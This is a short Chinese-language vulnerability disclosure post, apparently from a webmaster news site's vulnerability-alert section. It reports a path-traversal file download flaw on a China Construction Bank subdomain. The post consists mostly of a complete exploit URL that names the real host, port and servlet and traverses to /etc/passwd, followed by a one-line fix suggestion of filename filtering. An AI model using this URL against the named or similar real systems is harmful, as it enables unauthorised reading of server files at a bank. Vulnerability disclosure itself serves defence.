中国建设银行子站任意文件遍历下载漏洞下载

中国建设银行子站任意文件遍历下载漏洞

URL:https://b2b.ccb.cn:1025/NCCB/B2BFileIBSContentServlet?fileName=../../../../../../../../../../../../../../../../etc/passwd&branchId=999999001&language=CN&ibsReqType=2

修复方案:

文件名过滤。

上一篇: [公开漏洞]
下一篇: 如家宾馆WIFI密码缺陷和暴力破解下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细